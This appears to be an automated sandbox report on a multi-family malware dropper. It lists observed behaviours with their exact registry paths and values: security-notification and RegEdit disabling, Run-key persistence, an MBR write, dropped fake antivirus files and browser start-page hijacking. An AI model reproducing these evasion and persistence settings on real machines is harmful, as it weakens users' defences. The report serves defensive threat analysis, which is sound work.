Malware Analysis Report

2024-11-13 16:53

Sample ID 241108-vy1scswcrf
Target UltraDropper.exe
SHA256 46e78d76c9c3c0305c6a547525b3ea26f9a20e10fcf534a3886921304a5991b4
Tags
emotet eternity privateloader epoch5 banker bootkit discovery evasion loader persistence spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

46e78d76c9c3c0305c6a547525b3ea26f9a20e10fcf534a3886921304a5991b4

Threat Level: Known bad

The file UltraDropper.exe was found to be: Known bad.

Malicious Activity Summary

emotet eternity privateloader epoch5 banker bootkit discovery evasion loader persistence spyware stealer trojan upx

PrivateLoader

Privateloader family

Eternity family

Eternity

Emotet family

Windows security bypass

Emotet

Disables RegEdit via registry modification

Reads user/profile data of web browsers

Executes dropped EXE

Windows security modification

Loads dropped DLL

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Writes to the Master Boot Record (MBR)

Looks up external IP address via web service

Enumerates connected drives

Adds Run key to start application

Drops file in System32 directory

UPX packed file

Drops file in Program Files directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Views/modifies file attributes

Suspicious use of SetWindowsHookEx

System policy modification

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Modifies Internet Explorer start page

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 17:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 17:24

Reported

2024-11-08 17:25

Platform

win11-20241007-en

Max time kernel

45s

Max time network

46s

Command Line

"C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe"

Signatures

Emotet

trojan banker emotet

Emotet family

emotet

Eternity

eternity

Eternity family

eternity

PrivateLoader

loader privateloader

Privateloader family

privateloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" \??\c:\windows\antivirus-platinum.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Run\AntiVirus Pro 2017 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\[email protected]" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RegistrySmart = "\"C:\\Program Files\\RegistrySmart\\RegistrySmart.exe\" -boot" C:\Users\Admin\AppData\Local\Temp\is-QA5O7.tmp\is-CUTJ3.tmp N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\Install.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\RegistrySmart\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-QA5O7.tmp\is-CUTJ3.tmp N/A
File created C:\Program Files (x86)\RegistrySmart\is-QFOVQ.tmp C:\Users\Admin\AppData\Local\Temp\is-QA5O7.tmp\is-CUTJ3.tmp N/A
File created C:\Program Files (x86)\RegistrySmart\is-M3TM1.tmp C:\Users\Admin\AppData\Local\Temp\is-QA5O7.tmp\is-CUTJ3.tmp N/A
File created C:\Program Files (x86)\RegistrySmart\is-FJS9C.tmp C:\Users\Admin\AppData\Local\Temp\is-QA5O7.tmp\is-CUTJ3.tmp N/A
File created C:\Program Files (x86)\RegistrySmart\is-B80V8.tmp C:\Users\Admin\AppData\Local\Temp\is-QA5O7.tmp\is-CUTJ3.tmp N/A
File opened for modification C:\Program Files (x86)\RegistrySmart\RegistrySmart.url C:\Users\Admin\AppData\Local\Temp\is-QA5O7.tmp\is-CUTJ3.tmp N/A
File opened for modification C:\Program Files (x86)\RegistrySmart\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-QA5O7.tmp\is-CUTJ3.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Windows\__tmp_rar_sfx_access_check_240639890 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\windows\antivirus-platinum.exe C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\Tasks\RegistrySmart Scheduled Scan.job C:\Program Files (x86)\RegistrySmart\RegistrySmart.exe N/A
File opened for modification C:\Windows\Tasks\RegistrySmart Scheduled Scan.job C:\Program Files (x86)\RegistrySmart\RegistrySmart.exe N/A
File created C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\WINDOWS\302746537.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\RegistrySmart\Launcher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\antivirus-platinum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\RegistrySmart\RegistrySmart.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Worm (1).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-QA5O7.tmp\is-CUTJ3.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\RegistrySmart\RegistrySmart.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Internet Explorer\Main \??\c:\windows\antivirus-platinum.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Internet Explorer\Main\Window Title = "YOUR PC MAY BE INFECTED WITH SPYWARE OR OTHER MALICIOUS ITEMS" \??\c:\windows\antivirus-platinum.exe N/A

Modifies Internet Explorer start page

stealer
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" \??\c:\windows\antivirus-platinum.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" \??\c:\windows\antivirus-platinum.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.ImageListCtrl.2\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8A2-850A-101B-AFC0-4210102A8DA7}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6B7E6392-850A-101B-AFC0-4210102A8DA7}\1.3\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA60-E020-11CF-8E74-00A0C90F26F8} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8A7-850A-101B-AFC0-4210102A8DA7} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.TabStrip\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1EFB6594-857C-11D1-B16A-00C0F0283628}\ = "ITabStrip" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8A5-850A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8B1-850A-101B-AFC0-4210102A8DA7}\ = "IColumnHeader10" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.ProgCtrl\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA660-8594-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B7E638F-850A-101B-AFC0-4210102A8DA7}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8A5-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83602-895E-11D0-B0A6-000000000000}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8AF-850A-101B-AFC0-4210102A8DA7} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE32-8596-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F08DF953-8592-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}\MiscStatus\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF877890-E026-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF877896-E026-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA660-8594-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.TreeCtrl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA50-E020-11CF-8E74-00A0C90F26F8}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E8E-DF38-11CF-8E74-00A0C90F26F8}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF877896-E026-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C247F26-8591-11D1-B16A-00C0F0283628}\ = "IImage" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8A2-850A-101B-AFC0-4210102A8DA7}\ProgID\ = "COMCTL.TreeCtrl.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{612A8624-0FB3-11CE-8747-524153480004}\MiscStatus\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\ProgID\ = "COMCTL.ProgCtrl.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E451-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A0-850A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D8C-9D6A-101B-AFC0-4210102A8DA7}\ = "ListViewEvents" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8556BCD0-E01E-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1EFB6597-857C-11D1-B16A-00C0F0283628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66833FED-8583-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8E3867A1-8586-11D1-B16A-00C0F0283628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{35053A20-8589-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F055-858B-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA664-8594-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD9DA665-8594-11D1-B16A-00C0F0283628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E944-850A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8D0-850A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.ProgCtrl\CurVer\ = "MSComctlLib.ProgCtrl.2" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD9DA666-8594-11D1-B16A-00C0F0283628}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE35-8596-11D1-B16A-00C0F0283628}\ = "ImageList General Property Page Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2334D2B1-713E-11CF-8AE5-00AA00C00905}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8E3867A2-8586-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C247F24-8591-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.ImageListCtrl\ = "Microsoft ImageList Control 6.0 (SP4)" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8E3867A1-8586-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF877892-E026-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2C247F23-8591-11D1-B16A-00C0F0283628}\ProgID\ = "MSComctlLib.ImageListCtrl.2" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2C247F23-8591-11D1-B16A-00C0F0283628}\Implemented Categories C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\MiscStatus\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9ED94442-E5E8-101B-B9B5-444553540000}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E953-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94440-E5E8-101B-B9B5-444553540000}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

